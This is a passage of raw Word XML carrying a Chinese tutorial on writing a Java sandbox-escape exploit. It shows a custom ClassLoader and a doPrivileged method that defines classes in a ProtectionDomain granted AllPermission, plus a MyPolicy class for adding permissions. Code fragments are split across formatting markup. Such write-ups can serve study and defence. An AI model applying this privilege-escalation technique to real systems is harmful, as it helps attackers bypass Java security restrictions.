        <w:t>，然后继承</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，调用</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的方法，生成一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，这时候可以给</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>自定义权限。</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写</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>classLoader</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所以我们写</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，定义一个</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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="91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95"/>
      </w:tblGrid>
      <w:tr w:rsidR="00564D2E" w:rsidRPr="00564D2E" w:rsidTr="00564D2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9195"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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>public</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class</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> MyClassLoader </w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>extends</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ClassLoader</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tc>
      </w:tr>
    </w:tbl>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先定义一个</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，继承</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，写个方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“command”</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，这个方法返回调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AccessController.doPrivileged</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，请求超级权限。</w:t>
      </w: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564D2E" w:rsidRPr="00564D2E" w:rsidTr="00564D2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9330"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static</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String</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> command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throws</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Exception</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return</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3399"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>String</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AccessController</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doPrivileged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PrivilegedAction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Object</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> run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String</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> String1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00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"ExpPermissions2"</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66"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>byte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classData1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这里是</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ExpPermissions2</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>这个类，序列化后的</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000066"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>数组，代码等下讲。</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Class</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> localClass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66"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>null</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Certificate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arrayOfCertificate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Certificate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CC66CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>0</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Permissions</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> localPermissions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localPermissions.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>add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AllPermission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localPermissions.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>add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java.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>security</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="003399"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>SecurityPermission</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00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"*"</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localPermissions.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>add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java.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>security</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="003399"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>SecurityPermission</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00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"getPolicy"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ProtectionDomain</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> localProtectionDomain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ProtectionDomain</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CodeSource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localURL, arrayOfCertificate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localPermissions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66"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>byte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datclass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这里是</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">MyPolicy </w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>类的序列化数组，代码等下讲。</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mycl.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>defineClass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00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"MyPolicy"</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">, datclass, </w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CC66CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>, datclass.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>length</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>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localProtectionDomain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try</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Class</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> c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mycl.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>loadClass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String1</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localClass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c</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catch</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3399"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Exception</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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localClass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mycl.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>defineClass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String1, classData1, </w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CC66CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>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classData1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>length</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>, localProtectionDomain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p>
        </w:tc>
      </w:tr>
    </w:tbl>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细节有这面这些：</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lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>、新建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ProtectionDomain</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，加入</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>allPermissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>权限，这就是所有权限都有了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>、把这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ProtectionDomain</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>赋予</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExpPermissions2</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这个类。</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>、新建一个类，叫做</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mypolicy</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，这个类继承</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，用于加权限。</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这是因为我们当前的</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>是自己实现的，并没有加载过</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mypolicy</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这个类，所以必须把这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mypolicy</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这个类，走一遍</w:t>
      </w:r>
